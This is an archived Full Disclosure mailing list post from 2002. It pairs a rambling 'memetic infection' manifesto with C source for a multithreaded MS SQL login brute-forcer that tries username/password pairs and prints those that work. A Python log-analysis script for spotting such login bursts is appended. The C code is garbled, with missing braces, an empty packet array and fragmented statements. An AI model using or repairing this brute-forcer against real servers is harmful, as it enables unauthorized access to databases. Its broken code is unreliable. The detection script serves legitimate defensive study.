Full Disclosure mailing list archives


From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Tue, 13 Aug 2002 12:41:57 -0700

Hash: SHA1

/*ms sql brute thing found in wild, appears to be by some guy named adam
 *working exploit attached only for propagation of meme. ( No post meme. No
 *post code plz.)


 *This text is a neurolinguistic trap, whose mechanism is triggered by
*you at the moment when you subvocalize the words MeMe156, words that
*have now begun to infiltrate your mind in the same way that a computer
*virus might infect an artificially intelligent machine: already the
*bits of phonetic information stored within the words MeMe156 are
*using your neural circuitry to replicate themselves, to catalyze the
*crystalline growth of their own connotative network.

 *The words MeMe156 actually germinate via the subsequent metaphor into
*an expanding array of icy tendrils, all of which insinuate themselves
*so deeply into the architecture of your thoughts that the words MeMe
*156 cannot be extricated without uprooting your mind.

 *The consequences of this infection are not immediately obvious,
*although you may find yourself beginning to think fleetingly of certain subcultural terms, such as
*ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered
*fragments perhaps of some overheard conversation.

 *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic
*substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever
*useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and
*longevity). We refer to other sub.systems, and in doing so, interweave their memetic approaches
*with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially
*and has begun to infect the highest levels of INFOSEC, press, radio, and film.

 *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johann Pachelbel.

 *We refer to literary works, "Book of Five Rings", by Miyamoto Musashi, "Secret Societies and
*Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by
*Michael J. Gelb ( Substrain /How.to.Think.Like.Machiavelli in incubation stages).

* We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front"

 *We refer to the following fields of study:
*Complexity theory and post-structuralism;
*Memetics as an integrative field for the study of ALL fields;
*Autology as a means to community cohesion and survival.

 *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and
*non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect
*and direct the post-millennial attractor, utilizing the principle of auto.prophecy. We compel
*approach toward TAZ's which concentrate on NEGentropic self-organization rather than the deliberate
*hastening of maximal entropy.

* W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our descendants
*in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY

* We refer to multiple sub.strains of ourself, many of which are contradictory: We refer to again to
*the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen,
*must be responsible for isolating entropic memes.

* We refer to all signifiers, all that is signified, and the resultant significance on both global
*and local scales.

 *We refer to that which we contain, and that in which we are contained;

 *We refer now to you.

 *When you have finished reading the remaining nineteen words, this
*process of irreversible infection will be completed, and you will
*depart, believing yourself largely unaffected by this process.


#include <stdio.h>
#include <sys/time.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <pthread.h>

#define USERNAME_OFF 0x27
#define PASSWORD_LEN1_PAD 0x45
#define PASSWORD_TXT1 0x46
#define PASSWORD_LEN_REAL1 0x64
#define PASSWORD_LEN_REAL2 0xd3
#define PASSWORD_TXT2 0xd4
#define PASSWORD_LEN_PLUS2 0x1d1
#define MYNULL "%%NULL%%"

#include "libInet.c"

struct super_mssql_force
  u_long ip;
  u_long port;
  FILE *login_pass;
  int sport;

* Oh my! Tricky French comments ensue..
char fidel_packet[] =
/* | the username starts here */
/*                           | password length followed by the password; mind the padding! */

/* | real or padded password length, I don't know which */
/*                                | password length without padding, then the password */

/*****************| <== password length + 2 ***********/

char *
tstrstr(char *buff,char *w,int size)
register int i;
register int a;
int d;
int z;
int ws = strlen (w);

   for (a=0;a<strlen(w);a++) {
      if(i+a >size)return(NULL);
      if (buff[z++] == w[a]) d++;
      else break;

   if (d == ws)
     return( (buff+i) );


mssql_attack (struct super_mssql_force  * mssql)
char user[255];
char pass[255];
char tmp[4018];
char * real_pkt;
int s;
int r;

  while (1)

       s = connect_ip (mssql->ip, mssql->port, mssql->sport);

       if (s < 0)

        if (feof (mssql->login_pass))
        if (s)
        close (s);
        return (0);

        memset (user,0,sizeof(user));
        memset (pass,0,sizeof(pass));

        fscanf (mssql->login_pass, "%s%s\n", &user, &pass);

        if (strcmp  (pass,MYNULL) == 0)
           memset (pass,0,sizeof(pass));

        real_pkt = calloc (1, sizeof (fidel_packet)-1);

        memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1);

        strcpy ( (real_pkt + USERNAME_OFF), user);

        * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2;

        strcpy ( (real_pkt + PASSWORD_TXT1), pass);

        * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass);

        * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass);

        strcpy ( (real_pkt + PASSWORD_TXT2), pass);

        * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2;

        if (write (s,real_pkt,sizeof(fidel_packet)) < 0)
          perror ("write");

        if ( (r = read  (s,tmp,sizeof (tmp)) ) < 0)
          perror ("read");

        if (tstrstr (tmp,"Login failed",r))
          fprintf (stderr,"login failed for %s/%s\n",user,pass);
          close (s);

        printf ("%s:%s\n",user,pass);
        close (s);


usage (char * name)
printf ("ADAM's Ethical Crowbar! \n");
printf ("never forget your crowbar !\n");
printf ("%s <host> <port> -t <thread num> -s <src port>\n",name);
exit (0);

main (int argc, char **argv)
  pthread_t **pthread_id;
  int t_num = 3;
  int i;

  struct super_mssql_force mssql;

  memset (&mssql, 0, sizeof (mssql));

  if (argc < 3)
    usage (argv[0]);

  mssql.ip = host2ip (argv[1]);
  mssql.port = atoi (argv[2]);

/* we ignore Broken Pipe ! */
  signal (13, SIG_IGN);

  if (argc > 3)
      for (i = 3; i < argc; i++)
          if (argv[i][0] == '-')
            switch (argv[i][1])
              case 't':
                t_num = atoi (argv[i + 1]);

              case 's':
                mssql.sport = atoi (argv[i + 1]);

/* we read login password from the stdin */

  mssql.login_pass = stdin;

/* only one socket can bind at the same src port */

  if (mssql.sport)
      t_num = 1;
      fprintf (stderr,
               "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n");

  fprintf (stderr, "mssql sport %i\n", mssql.sport);
  fprintf (stderr, "thread    %i\n", t_num);

/* if the user dont know how try the mssql allow we count it for him! */

  pthread_id = calloc (1, sizeof (pthread_t *) * t_num);

  for (i = 0; i < t_num; i++)
    pthread_id[i] = calloc (1, sizeof (pthread_t));

  for (i = 0; i < t_num; i++)
    pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql);

  for (i = 0; i < t_num; i++)
    pthread_join (*pthread_id[i], NULL);


Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
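
Seen from the server side, a tool like the one posted above shows up as a rapid run of failed logins from a single client, sometimes ending in a success. The following detection logic is an added example, not part of the original post; the log line layout, the sample lines, the function name detect_bruteforce and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line layout, modelled on SQL Server errorlog logon entries.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<ip>[^\]]+)\]")

# Constructed sample log (documentation IP ranges), not from the original post.
SAMPLE = [
    "2002-08-13 12:41:49.00 Server      Starting up database 'master'.",
    "2002-08-13 12:41:50.10 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.10]",
    "2002-08-13 12:41:51.20 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.10]",
    "2002-08-13 12:41:52.05 Logon       Login failed for user 'report'. [CLIENT: 198.51.100.7]",
    "2002-08-13 12:41:52.30 Logon       Login failed for user 'admin'. [CLIENT: 192.0.2.10]",
    "2002-08-13 12:41:53.40 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.10]",
    "2002-08-13 12:41:54.50 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.10]",
    "2002-08-13 12:41:55.60 Logon       Login succeeded for user 'sa'. [CLIENT: 192.0.2.10]",
    "2002-08-13 12:42:10.00 Logon       Login succeeded for user 'report'. [CLIENT: 198.51.100.7]",
]

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (client, kind, user, failures_in_window) tuples."""
    recent = defaultdict(deque)   # client -> timestamps of recent failures
    flagged = set()               # clients already reported for a burst
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue              # not a logon entry
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        q = recent[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()           # drop failures that left the window
        if m["result"] == "failed":
            q.append(ts)
            if len(q) >= threshold and m["ip"] not in flagged:
                flagged.add(m["ip"])
                alerts.append((m["ip"], "burst", m["user"], len(q)))
        elif len(q) >= threshold:
            # A success straight after a burst suggests a guessed password.
            alerts.append((m["ip"], "success-after-burst", m["user"], len(q)))
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE):
        print(alert)
```

The success-after-burst alert can only fire when the server's login auditing records successful logins as well as failed ones.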

